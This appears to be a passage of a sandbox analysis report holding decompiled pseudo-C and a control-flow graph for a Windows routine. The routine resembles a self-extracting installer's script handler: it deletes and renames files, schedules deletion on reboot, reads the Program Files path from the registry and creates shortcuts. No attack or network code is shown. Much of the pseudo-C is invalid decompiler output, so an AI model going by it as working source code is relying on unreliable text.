                                                                                                                                                  control_flow_graph 1222 40c78e-40c792 1223 40c798-40c7a8 call 40a250 1222->1223 1224 40ca2a-40ca52 call 40b613 1222->1224 1231 40c7aa-40c7ad 1223->1231 1232 40c7cd 1223->1232 1229 40bfe1-40c001 1224->1229 1230 40ca58-40ca5c 1224->1230 1233 40c008-40c01b call 40a925 1229->1233 1235 40c7c4-40c7cb 1231->1235 1236 40c7af-40c7b0 1231->1236 1237 40c7d4-40c7fc call 40a477 1232->1237 1245 40c01d 1233->1245 1235->1237 1240 40c7b2-40c7b9 1236->1240 1241 40c7bb-40c7c2 1236->1241 1246 40c83d-40c84d call 405767 1237->1246 1247 40c7fe-40c821 call 40a477 call 4073ab 1237->1247 1240->1237 1241->1237 1248 40c021-40c03a lstrcmpiA 1245->1248 1256 40c8c0-40c8c7 1246->1256 1257 40c84f-40c85e 1246->1257 1247->1256 1268 40c827-40c838 call 40a477 1247->1268 1251 40c04a-40c04e 1248->1251 1252 40c03c-40c043 1248->1252 1251->1224 1258 40c054-40c057 1251->1258 1252->1248 1255 40c045 1252->1255 1255->1224 1262 40c8c9-40c8d7 call 405822 1256->1262 1263 40c8dc-40c911 call 405822 call 40aac2 call 4076c8 1256->1263 1257->1256 1261 40c860-40c865 1257->1261 1264 40c313-40c317 1258->1264 1265 40c2f4-40c2f8 1258->1265 1266 40c266-40c26a 1258->1266 1267 40c05e-40c062 1258->1267 1270 40c867-40c86a 1261->1270 1271 40c86c-40c87f call 405767 1261->1271 1262->1263 1319 40c932-40c952 call 40a477 1263->1319 1320 40c913-40c92d call 40a5e2 call 4076c8 1263->1320 1264->1224 1276 40c31d-40c324 1264->1276 1265->1224 1274 40c2fe-40c30e SetWindowTextA 1265->1274 1266->1224 1269 40c270-40c27c 1266->1269 1267->1224 1273 40c068-40c0ea GetCurrentDirectoryA call 40a477 call 4076c8 call 40a5e2 call 405bad call 405bdd call 403556 call 405fad 1267->1273 1268->1256 1278 40c289-40c28d 1269->1278 1279 40c27e-40c284 call 40a5e2 1269->1279 1270->1271 1280 40c8b3-40c8b7 1270->1280 1299 40c8b1 1271->1299 1300 40c881-40c886 1271->1300 1386 40c0f0 1273->1386 1387 40c256-40c261 call 405bca 1273->1387 1274->1224 1276->1224 1284 40c32a-40c33e 1276->1284 1287 40c297-40c29f call 40b7ba 1278->1287 1288 40c28f-40c295 1278->1288 1279->1278 1280->1261 1289 40c8b9-40c8bb 1280->1289 1293 40c340 1284->1293 1294 40c346-40c351 call 40a384 1284->1294 1296 40c2a1-40c2a3 1287->1296 1288->1296 1289->1256 1298 40c8bd 1289->1298 1293->1294 1294->1224 1313 40c357-40c35b 1294->1313 1306 40c2a5-40c2a7 1296->1306 1307 40c2a9-40c2b4 call 40a384 1296->1307 1298->1256 1299->1280 1308 40c888-40c898 1300->1308 1309 40c89a-40c89e 1300->1309 1314 40c2b6-40c2d3 call 40a384 call 40a224 1306->1314 1307->1314 1316 40c8a7-40c8af call 40a477 1308->1316 1309->1309 1311 40c8a0-40c8a1 1309->1311 1311->1316 1322 40c361-40c365 1313->1322 1323 40c408-40c40a 1313->1323 1349 40c2d5 1314->1349 1350 40c2d8-40c2e3 call 40a5e2 1314->1350 1316->1280 1347 40c954 1319->1347 1348 40c95a-40c97b call 4073db call 40a5e2 call 407690 1319->1348 1320->1319 1322->1323 1330 40c36b 1322->1330 1331 40c410-40c412 1323->1331 1332 40c36e-40c376 call 40a477 1323->1332 1330->1332 1337 40c414-40c418 1331->1337 1338 40c41e-40c438 RegOpenKeyExA 1331->1338 1344 40c37b-40c38b call 40a3d9 1332->1344 1337->1332 1337->1338 1345 40c469-40c470 1338->1345 1346 40c43a-40c463 RegQueryValueExA RegCloseKey 1338->1346 1365 40c396-40c3e1 call 40a477 call 40b9b0 GetDlgItem SetWindowTextA SendMessageA call 40a4e9 1344->1365 1366 40c38d-40c391 1344->1366 1353 40c472-40c489 call 40a384 1345->1353 1354 40c49c-40c4b8 call 40a384 * 2 1345->1354 1346->1345 1347->1348 1389 40c98c-40c998 call 40a5e2 1348->1389 1390 40c97d-40c98a call 40a59a 1348->1390 1349->1350 1350->1224 1370 40c2e9-40c2ef call 40a205 1350->1370 1353->1354 1374 40c48b-40c497 call 40a5e2 1353->1374 1354->1344 1384 40c4be-40c4cb call 40a5e2 1354->1384 1403 40c3e6-40c3e8 1365->1403 1366->1365 1372 40c393 1366->1372 1370->1224 1372->1365 1374->1354 1384->1224 1384->1344 1392 40c0f5-40c10b SetFileAttributesA 1386->1392 1387->1224 1405 40c99d-40ca03 call 4058ff call 40a9bd 1389->1405 1390->1389 1390->1405 1398 40c111-40c119 call 406ea5 1392->1398 1399 40c1bb-40c1c7 GetFileAttributesA 1392->1399 1398->1399 1415 40c11f-40c150 call 407300 call 4076c8 call 40a384 1398->1415 1401 40c1c9-40c1d8 DeleteFileA 1399->1401 1402 40c23a-40c250 call 405fad 1399->1402 1401->1402 1407 40c1da-40c1de 1401->1407 1402->1387 1402->1392 1403->1224 1408 40c3ee-40c403 SendMessageA 1403->1408 1405->1224 1425 40ca05-40ca1b SHChangeNotify 1405->1425 1412 40c1e6-40c206 wsprintfA GetFileAttributesA 1407->1412 1408->1224 1416 40c1e0-40c1e3 1412->1416 1417 40c208-40c21e MoveFileA 1412->1417 1431 40c152-40c161 call 40a384 1415->1431 1432 40c163-40c173 call 407279 1415->1432 1416->1412 1417->1402 1421 40c220-40c227 call 406ea5 1417->1421 1421->1402 1429 40c229-40c234 MoveFileExA 1421->1429 1425->1224 1429->1402 1431->1432 1437 40c179-40c1b5 call 40a384 call 40a289 SHFileOperationA 1431->1437 1432->1387 1432->1437 1437->1399
                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E0040C78E(void* __ecx, void* __esi) {
                                                                                                                                                  				intOrPtr _t231;
                                                                                                                                                  				void* _t232;
                                                                                                                                                  				void* _t307;
                                                                                                                                                  				void* _t309;
                                                                                                                                                  
                                                                                                                                                  				L0:
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L0:
                                                                                                                                                  					_t307 = __esi;
                                                                                                                                                  					if( *((intOrPtr*)(_t309 + 0x10)) != 6) {
                                                                                                                                                  						goto L152;
                                                                                                                                                  					}
                                                                                                                                                  					L115:
                                                                                                                                                  					__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                  					__eax = E0040A250(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                  					__eax = __eax - 0x50;
                                                                                                                                                  					__eflags = __eax;
                                                                                                                                                  					if(__eax == 0) {
                                                                                                                                                  						 *(__ebp - 4) = 2;
                                                                                                                                                  					} else {
                                                                                                                                                  						__eax = __eax - 3;
                                                                                                                                                  						__eflags = __eax;
                                                                                                                                                  						if(__eax == 0) {
                                                                                                                                                  							 *(__ebp - 4) = 0xb;
                                                                                                                                                  						} else {
                                                                                                                                                  							__eax = __eax - 1;
                                                                                                                                                  							__eflags = __eax;
                                                                                                                                                  							if(__eax == 0) {
                                                                                                                                                  								 *(__ebp - 4) = 7;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *(__ebp - 4) = 0x10;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                  					 *(__ebp - 0x2034) = 0;
                                                                                                                                                  					 *(__ebp - 0x834) = 0;
                                                                                                                                                  					__eax = E0040A477(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                  					__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						L125:
                                                                                                                                                  						__ebp - 0xc34 = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                  						__eflags = __al;
                                                                                                                                                  						if(__al != 0) {
                                                                                                                                                  							goto L139;
                                                                                                                                                  						}
                                                                                                                                                  						L126:
                                                                                                                                                  						__edi = 0;
                                                                                                                                                  						__eflags =  *(__ebp - 0xc34);
                                                                                                                                                  						__esi = __ebp - 0xc34;
                                                                                                                                                  						if( *(__ebp - 0xc34) == 0) {
                                                                                                                                                  							goto L139;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L127;
                                                                                                                                                  						}
                                                                                                                                                  						do {
                                                                                                                                                  							L127:
                                                                                                                                                  							__bl = __esi->i;
                                                                                                                                                  							__eflags = __bl - 0x20;
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								L129:
                                                                                                                                                  								__eax = __ebp - 0xc34;
                                                                                                                                                  								__esi->i = 0;
                                                                                                                                                  								__eax = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                  								__eflags = __al;
                                                                                                                                                  								if(__al == 0) {
                                                                                                                                                  									L135:
                                                                                                                                                  									__esi->i = __bl;
                                                                                                                                                  									goto L136;
                                                                                                                                                  								}
                                                                                                                                                  								L130:
                                                                                                                                                  								__edi = __esi;
                                                                                                                                                  								__eflags = __bl - 0x2f;
                                                                                                                                                  								if(__bl != 0x2f) {
                                                                                                                                                  									do {
                                                                                                                                                  										L132:
                                                                                                                                                  										__esi =  &(__esi->i);
                                                                                                                                                  										__eflags = __esi->i - 0x20;
                                                                                                                                                  									} while (__esi->i == 0x20);
                                                                                                                                                  									_push(__esi);
                                                                                                                                                  									__eax = __ebp - 0x834;
                                                                                                                                                  									L134:
                                                                                                                                                  									_push(__eax);
                                                                                                                                                  									__eax = E0040A477();
                                                                                                                                                  									 *__edi = __bl;
                                                                                                                                                  									goto L136;
                                                                                                                                                  								}
                                                                                                                                                  								L131:
                                                                                                                                                  								_t185 =  &(__esi->i); // 0x1
                                                                                                                                                  								__eax = _t185;
                                                                                                                                                  								_push(_t185);
                                                                                                                                                  								 *(__ebp - 0x834) = __bl;
                                                                                                                                                  								__eax = __ebp - 0x833;
                                                                                                                                                  								goto L134;
                                                                                                                                                  							}
                                                                                                                                                  							L128:
                                                                                                                                                  							__eflags = __bl - 0x2f;
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								goto L136;
                                                                                                                                                  							}
                                                                                                                                                  							goto L129;
                                                                                                                                                  							L136:
                                                                                                                                                  							__esi =  &(__esi->i);
                                                                                                                                                  							__eflags = __esi->i;
                                                                                                                                                  						} while (__esi->i != 0);
                                                                                                                                                  						__eflags = __edi;
                                                                                                                                                  						if(__edi != 0) {
                                                                                                                                                  							 *__edi = 0;
                                                                                                                                                  						}
                                                                                                                                                  						goto L139;
                                                                                                                                                  					} else {
                                                                                                                                                  						L123:
                                                                                                                                                  						__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                  						E0040A477(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                  						__eax = E004073AB(__ebp - 0xc33, 0x22);
                                                                                                                                                  						__eflags = __eax;
                                                                                                                                                  						if(__eax != 0) {
                                                                                                                                                  							 *__eax = 0;
                                                                                                                                                  							__ebp - 0x834 = E0040A477(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                  						}
                                                                                                                                                  						L139:
                                                                                                                                                  						__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                  						if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                  							__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                  							__eax = E00405822(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                  						}
                                                                                                                                                  						__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                  						E00405822(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                  						__eax = E0040AAC2(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                  						__ebp - 0x434 = E004076C8(__ebp - 0x434);
                                                                                                                                                  						__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                  						if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                  							__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                  							E0040A5E2(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                  							__eax = E004076C8(__ebp - 0x434);
                                                                                                                                                  						}
                                                                                                                                                  						__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                  						__eax = E0040A477(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                  						__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                  						__eax = __ebp - 0x74dc;
                                                                                                                                                  						if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                  							__eax = __ebp - 0xa4dc;
                                                                                                                                                  						}
                                                                                                                                                  						__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                  						__eax = __ebp - 0x434;
                                                                                                                                                  						__eax = E00407690(__ebp - 0x434);
                                                                                                                                                  						__eflags = __eax;
                                                                                                                                                  						if(__eax == 0) {
                                                                                                                                                  							L147:
                                                                                                                                                  							__ebp - 0x434 = E0040A5E2(__ebp - 0x434, ".lnk");
                                                                                                                                                  							goto L148;
                                                                                                                                                  						} else {
                                                                                                                                                  							L146:
                                                                                                                                                  							__eax = E0040A59A(__eax, ".lnk");
                                                                                                                                                  							__eflags = __eax;
                                                                                                                                                  							if(__eax == 0) {
                                                                                                                                                  								L148:
                                                                                                                                                  								__ebp - 0x434 = E004058FF(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                  								 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                  								__ecx = __ebp - 0x834;
                                                                                                                                                  								 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                  								__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                  								__ecx = __ebp - 0x2034;
                                                                                                                                                  								 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                  								__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                  								__ecx = __ebp - 0x84dc;
                                                                                                                                                  								 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                  								__ebp - 0x44dc = E0040A9BD(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                  								__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                  								if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                  									__eax = __ebp - 0x34d4;
                                                                                                                                                  									SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                  								}
                                                                                                                                                  								while(1) {
                                                                                                                                                  									L152:
                                                                                                                                                  									_t231 = E0040B613(0x1000, _t307,  *((intOrPtr*)(_t309 + 0xc)), _t309 - 0x54dc, _t309 - 0x1c34, _t309 - 5, _t309 + 0xf);
                                                                                                                                                  									 *((intOrPtr*)(_t309 + 0xc)) = _t231;
                                                                                                                                                  									if(_t231 != 0) {
                                                                                                                                                  										_t307 = GetFileAttributesA;
                                                                                                                                                  										_t232 = _t309 - 0x1c34;
                                                                                                                                                  										 *(_t309 - 4) = _t309 - 0xb4dc;
                                                                                                                                                  										 *((intOrPtr*)(_t309 - 0xc)) = 6;
                                                                                                                                                  										goto L2;
                                                                                                                                                  									} else {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									L4:
                                                                                                                                                  									while(lstrcmpiA(_t309 - 0x54dc,  *(0x4140b8 +  *(_t309 - 4) * 4)) != 0) {
                                                                                                                                                  										 *(_t309 - 4) =  *(_t309 - 4) + 1;
                                                                                                                                                  										if( *(_t309 - 4) < 0xd) {
                                                                                                                                                  											continue;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L152;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(_t309 - 4) - 0xc;
                                                                                                                                                  									if( *(_t309 - 4) > 0xc) {
                                                                                                                                                  										continue;
                                                                                                                                                  									}
                                                                                                                                                  									L8:
                                                                                                                                                  									switch( *((intOrPtr*)( *(_t309 - 4) * 4 +  &M0040CA61))) {
                                                                                                                                                  										case 0:
                                                                                                                                                  											L9:
                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t309 + 0x10)) - 2;
                                                                                                                                                  											if( *((intOrPtr*)(_t309 + 0x10)) != 2) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L10:
                                                                                                                                                  											GetCurrentDirectoryA(0x400, _t309 - 0x434);
                                                                                                                                                  											E0040A477(_t309 - 0xc34, _t309 - 0x434);
                                                                                                                                                  											E004076C8(_t309 - 0xc34);
                                                                                                                                                  											E0040A5E2(_t309 - 0xc34, _t309 - 0x1c34);
                                                                                                                                                  											E00405BAD(_t309 - 0x40dc);
                                                                                                                                                  											E00405BDD(_t309 - 0x40dc, _t309 - 0xc34);
                                                                                                                                                  											E00403556(_t309 - 0x30d4);
                                                                                                                                                  											_push(0);
                                                                                                                                                  											_t301 = _t309 - 0x40dc;
                                                                                                                                                  											_t252 = E00405FAD(_t309 - 0x40dc, _t303, _t309 - 0x30d4);
                                                                                                                                                  											__eflags = _t252;
                                                                                                                                                  											if(_t252 == 0) {
                                                                                                                                                  												L27:
                                                                                                                                                  												E00405BCA(_t309 - 0x40dc);
                                                                                                                                                  												goto L152;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t295 = "%s.%d.tmp";
                                                                                                                                                  												do {
                                                                                                                                                  													L12:
                                                                                                                                                  													SetFileAttributesA(_t309 - 0x30d4, 0);
                                                                                                                                                  													__eflags =  *((char*)(_t309 - 0x24c4));
                                                                                                                                                  													if( *((char*)(_t309 - 0x24c4)) == 0) {
                                                                                                                                                  														L18:
                                                                                                                                                  														_t257 = GetFileAttributesA(_t309 - 0x30d4);
                                                                                                                                                  														__eflags = _t257 - 0xffffffff;
                                                                                                                                                  														if(_t257 == 0xffffffff) {
                                                                                                                                                  															goto L26;
                                                                                                                                                  														}
                                                                                                                                                  														L19:
                                                                                                                                                  														_t261 = DeleteFileA(_t309 - 0x30d4);
                                                                                                                                                  														__eflags = _t261;
                                                                                                                                                  														if(_t261 != 0) {
                                                                                                                                                  															goto L26;
                                                                                                                                                  														} else {
                                                                                                                                                  															 *(_t309 - 4) =  *(_t309 - 4) & _t261;
                                                                                                                                                  															_push(_t261);
                                                                                                                                                  															goto L22;
                                                                                                                                                  															L22:
                                                                                                                                                  															wsprintfA(_t309 - 0x834, _t295, _t309 - 0x30d4);
                                                                                                                                                  															_t311 = _t311 + 0x10;
                                                                                                                                                  															_t266 = GetFileAttributesA(_t309 - 0x834);
                                                                                                                                                  															__eflags = _t266 - 0xffffffff;
                                                                                                                                                  															if(_t266 != 0xffffffff) {
                                                                                                                                                  																_t60 = _t309 - 4;
                                                                                                                                                  																 *_t60 =  *(_t309 - 4) + 1;
                                                                                                                                                  																__eflags =  *_t60;
                                                                                                                                                  																_push( *(_t309 - 4));
                                                                                                                                                  																goto L22;
                                                                                                                                                  															} else {
                                                                                                                                                  																_t269 = MoveFileA(_t309 - 0x30d4, _t309 - 0x834);
                                                                                                                                                  																__eflags = _t269;
                                                                                                                                                  																if(_t269 != 0) {
                                                                                                                                                  																	_t270 = E00406EA5();
                                                                                                                                                  																	__eflags = _t270;
                                                                                                                                                  																	if(_t270 != 0) {
                                                                                                                                                  																		MoveFileExA(_t309 - 0x834, 0, 4);
                                                                                                                                                  																	}
                                                                                                                                                  																}
                                                                                                                                                  																goto L26;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  													L13:
                                                                                                                                                  													__eflags = E00406EA5() - 4;
                                                                                                                                                  													if(__eflags == 0) {
                                                                                                                                                  														goto L18;
                                                                                                                                                  													}
                                                                                                                                                  													L14:
                                                                                                                                                  													E00407300(_t301, __eflags, _t309 - 0x434, _t309 - 0x2034);
                                                                                                                                                  													E004076C8(_t309 - 0x2034);
                                                                                                                                                  													_t280 = E0040A384(_t301, _t309 - 0x434);
                                                                                                                                                  													 *((intOrPtr*)(_t309 - 0xc)) = _t280;
                                                                                                                                                  													__eflags = _t280 - 4;
                                                                                                                                                  													if(_t280 < 4) {
                                                                                                                                                  														L16:
                                                                                                                                                  														_t282 = E00407279(_t301, _t309 - 0x1c34, 0);
                                                                                                                                                  														__eflags = _t282;
                                                                                                                                                  														if(_t282 != 0) {
                                                                                                                                                  															goto L27;
                                                                                                                                                  														}
                                                                                                                                                  														L17:
                                                                                                                                                  														 *((char*)(_t309 + E0040A384(_t301, _t309 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                  														E0040A289(_t301, _t309 - 0x34, 0, 0x1e);
                                                                                                                                                  														_push(0x14);
                                                                                                                                                  														_pop(_t287);
                                                                                                                                                  														 *((short*)(_t309 - 0x24)) = _t287;
                                                                                                                                                  														 *((intOrPtr*)(_t309 - 0x2c)) = _t309 - 0x30d4;
                                                                                                                                                  														 *((intOrPtr*)(_t309 - 0x30)) = 3;
                                                                                                                                                  														SHFileOperationA(_t309 - 0x34);
                                                                                                                                                  														goto L18;
                                                                                                                                                  													}
                                                                                                                                                  													L15:
                                                                                                                                                  													_t292 = E0040A384(_t301, _t309 - 0x2034);
                                                                                                                                                  													__eflags =  *((intOrPtr*)(_t309 - 0xc)) - _t292;
                                                                                                                                                  													if( *((intOrPtr*)(_t309 - 0xc)) > _t292) {
                                                                                                                                                  														goto L17;
                                                                                                                                                  													}
                                                                                                                                                  													goto L16;
                                                                                                                                                  													L26:
                                                                                                                                                  													_push(0);
                                                                                                                                                  													_t301 = _t309 - 0x40dc;
                                                                                                                                                  													_t259 = E00405FAD(_t309 - 0x40dc, _t303, _t309 - 0x30d4);
                                                                                                                                                  													__eflags = _t259;
                                                                                                                                                  												} while (_t259 != 0);
                                                                                                                                                  												goto L27;
                                                                                                                                                  											}
                                                                                                                                                  										case 1:
                                                                                                                                                  											L28:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10);
                                                                                                                                                  											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                  												__eax =  *0x41a81c;
                                                                                                                                                  												__eflags =  *0x41a81c;
                                                                                                                                                  												__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                  												__eflags = __bl;
                                                                                                                                                  												if(__bl == 0) {
                                                                                                                                                  													__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                  												}
                                                                                                                                                  												L31:
                                                                                                                                                  												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                  												if(__eflags == 0) {
                                                                                                                                                  													__esi = __ebp + 0xc;
                                                                                                                                                  													__edi = E0040B7BA(__ebp + 0xc, __eflags);
                                                                                                                                                  												} else {
                                                                                                                                                  													__edi = __ebp - 0x1c34;
                                                                                                                                                  												}
                                                                                                                                                  												__eflags = __bl;
                                                                                                                                                  												if(__bl == 0) {
                                                                                                                                                  													__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                  												} else {
                                                                                                                                                  													__esi = 0;
                                                                                                                                                  												}
                                                                                                                                                  												E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                  												__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                  												 *0x41a81c = __eax;
                                                                                                                                                  												__eflags = __bl;
                                                                                                                                                  												if(__bl != 0) {
                                                                                                                                                  													 *__eax = 0;
                                                                                                                                                  												}
                                                                                                                                                  												L39:
                                                                                                                                                  												__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                  												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                  												if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                  													__eax = E0040A205(__edi);
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											goto L152;
                                                                                                                                                  										case 2:
                                                                                                                                                  											L41:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10);
                                                                                                                                                  											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                  												__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                  											}
                                                                                                                                                  											goto L152;
                                                                                                                                                  										case 3:
                                                                                                                                                  											L43:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10);
                                                                                                                                                  											if( *(__ebp + 0x10) != 0) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L44:
                                                                                                                                                  											__eflags =  *0x419f92;
                                                                                                                                                  											if( *0x419f92 != 0) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L45:
                                                                                                                                                  											__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                  											__esi = __ebp - 0x1c34;
                                                                                                                                                  											 *(__ebp - 0x434) = 0;
                                                                                                                                                  											if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                  												__esi = __ebp - 0x1c33;
                                                                                                                                                  											}
                                                                                                                                                  											__eax = E0040A384(__ecx, __esi);
                                                                                                                                                  											__eflags = __eax - 0x400;
                                                                                                                                                  											if(__eax >= 0x400) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											} else {
                                                                                                                                                  												L48:
                                                                                                                                                  												__al = __esi->i;
                                                                                                                                                  												__eflags = __al - 0x2e;
                                                                                                                                                  												if(__al != 0x2e) {
                                                                                                                                                  													L57:
                                                                                                                                                  													__eflags = __al - 0x5c;
                                                                                                                                                  													if(__al == 0x5c) {
                                                                                                                                                  														L51:
                                                                                                                                                  														__ebp - 0x434 = E0040A477(__ebp - 0x434, __esi);
                                                                                                                                                  														L52:
                                                                                                                                                  														__eax = __ebp - 0x434;
                                                                                                                                                  														__eax = E0040A3D9(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                  														__eflags = __eax;
                                                                                                                                                  														if(__eax != 0) {
                                                                                                                                                  															__eflags =  *((char*)(__eax + 1));
                                                                                                                                                  															if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                  																 *__eax = 0;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  														__ebp - 0x434 = E0040A477(__ebx, __ebp - 0x434);
                                                                                                                                                  														__ebp - 0x434 = E0040B9B0(__esi, __ebp - 0x434); // executed
                                                                                                                                                  														__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                  														__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                  														__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                  														__eax = __ebp - 0x434;
                                                                                                                                                  														__eax = E0040A4E9(__ebx, __ebp - 0x434);
                                                                                                                                                  														__eflags = __eax;
                                                                                                                                                  														if(__eax != 0) {
                                                                                                                                                  															__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                  														}
                                                                                                                                                  														goto L152;
                                                                                                                                                  													}
                                                                                                                                                  													L58:
                                                                                                                                                  													__eflags = __al;
                                                                                                                                                  													if(__al == 0) {
                                                                                                                                                  														L60:
                                                                                                                                                  														__eax = __ebp - 0x10;
                                                                                                                                                  														__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10);
                                                                                                                                                  														__eflags = __eax;
                                                                                                                                                  														if(__eax == 0) {
                                                                                                                                                  															__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                  															__eax = __ebp - 0x14;
                                                                                                                                                  															 *(__ebp - 0xc) = 0x400;
                                                                                                                                                  															RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc) = RegCloseKey( *(__ebp - 0x10));
                                                                                                                                                  														}
                                                                                                                                                  														__eflags =  *(__ebp - 0x434);
                                                                                                                                                  														if( *(__ebp - 0x434) != 0) {
                                                                                                                                                  															__eax = __ebp - 0x434;
                                                                                                                                                  															__eax = E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                  															__ecx = __ebp - 0x434;
                                                                                                                                                  															__ecx = __ebp - 0x433;
                                                                                                                                                  															__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                  															if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                  																__ebp - 0x434 = E0040A5E2(__ebp - 0x434, "\\");
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  														__edi = E0040A384(__ecx, __esi);
                                                                                                                                                  														__eax = __ebp - 0x434;
                                                                                                                                                  														__edi = __edi + E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                  														__eflags = __edi - 0x3ff;
                                                                                                                                                  														if(__edi < 0x3ff) {
                                                                                                                                                  															__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __esi);
                                                                                                                                                  														}
                                                                                                                                                  														goto L52;
                                                                                                                                                  													}
                                                                                                                                                  													L59:
                                                                                                                                                  													__eflags = __esi->i - 0x3a;
                                                                                                                                                  													if(__esi->i == 0x3a) {
                                                                                                                                                  														goto L51;
                                                                                                                                                  													}
                                                                                                                                                  													goto L60;
                                                                                                                                                  												}
                                                                                                                                                  												L49:
                                                                                                                                                  												__eflags = __esi->i - 0x5c;
                                                                                                                                                  												if(__esi->i != 0x5c) {
                                                                                                                                                  													goto L57;
                                                                                                                                                  												}
                                                                                                                                                  												L50:
                                                                                                                                                  												__esi =  &(__esi->i);
                                                                                                                                                  												__eflags = __esi;
                                                                                                                                                  												goto L51;
                                                                                                                                                  											}
